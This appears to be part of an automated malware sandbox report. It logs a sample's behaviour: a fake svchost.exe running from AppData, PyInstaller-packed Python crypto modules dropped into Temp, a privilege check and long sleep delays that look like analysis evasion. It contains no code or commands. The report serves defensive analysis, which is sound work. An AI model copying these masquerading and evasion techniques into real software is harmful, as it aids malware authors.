                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\vds.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\main.exeMemory allocated: 8B0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\main.exeMemory allocated: 1A530000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeMemory allocated: 2D10000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeMemory allocated: 1AD10000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeMemory allocated: 2DF0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\svchost.exeMemory allocated: 1ADF0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\svchost.exeMemory allocated: 2BC0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\svchost.exeMemory allocated: 1ABC0000 memory reserve | memory write watch
                  Source: C:\Windows\System32\vds.exeFile opened / queried: scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: C:\Users\user\Desktop\main.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\svchost.exeWindow / User API: threadDelayed 1012Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeWindow / User API: threadDelayed 2262Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeWindow / User API: threadDelayed 1436
                  Source: C:\Users\user\AppData\Roaming\svchost.exeWindow / User API: threadDelayed 395
                  Source: C:\Users\user\Desktop\Mai.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-core-file-l2-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Hash\_BLAKE2b.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76562\python311.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76562\_hashlib.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Hash\_SHA256.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Cipher\_Salsa20.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Hash\_MD4.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-core-string-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Cipher\_raw_aesni.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76562\_asyncio.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Cipher\_chacha20.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76562\_bz2.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Cipher\_raw_eksblowfish.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76562\pywin32_system32\pywintypes311.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76562\_sqlite3.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Hash\_poly1305.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76562\_lzma.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Math\_modexp.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\PublicKey\_x25519.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\PublicKey\_ed25519.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76562\_socket.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-core-file-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76562\python3.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76562\_overlapped.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\PublicKey\_ec_ws.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76562\_ssl.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Cipher\_pkcs1_decode.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76562\_queue.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-core-file-l1-2-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Cipher\_raw_ofb.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-core-console-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Cipher\_raw_ocb.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Cipher\_raw_aes.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Cipher\_ARC4.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Hash\_ghash_clmul.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Hash\_RIPEMD160.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76562\_cffi_backend.cp311-win_amd64.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Cipher\_raw_blowfish.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Cipher\_raw_ctr.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Cipher\_raw_cfb.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76562\_multiprocessing.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Cipher\_raw_des3.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Hash\_keccak.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76562\pyexpat.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Hash\_MD5.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\PublicKey\_ed448.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Util\_strxor.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76562\charset_normalizer\md__mypyc.cp311-win_amd64.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Hash\_MD2.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76562\select.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Hash\_ghash_portable.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76562\unicodedata.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Util\_cpuid_c.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-core-util-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Protocol\_scrypt.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Hash\_SHA384.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76562\charset_normalizer\md.cp311-win_amd64.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Cipher\_raw_cast.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76562\cryptography\hazmat\bindings\_rust.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76562\win32\win32api.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Cipher\_raw_arc2.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Hash\_SHA512.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Hash\_SHA224.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Hash\_BLAKE2s.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Cipher\_raw_cbc.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Hash\_SHA1.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76562\_ctypes.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76562\_decimal.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Cipher\_raw_ecb.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76562\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI76562\Crypto\Cipher\_raw_des.pydJump to dropped file
                  Source: C:\Users\user\Desktop\Mai.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_2-16369
                  Source: C:\Users\user\Desktop\Mai.exeAPI coverage: 0.6 %
                  Source: C:\Users\user\Desktop\main.exe TID: 7696Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 7820Thread sleep count: 1012 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 2844Thread sleep count: 2262 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 7088Thread sleep count: 280 > 30Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 4676Thread sleep count: 1436 > 30
                  Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 7552Thread sleep count: 395 > 30
                  Source: C:\Windows\System32\svchost.exe TID: 2296Thread sleep time: -30000s >= -30000s
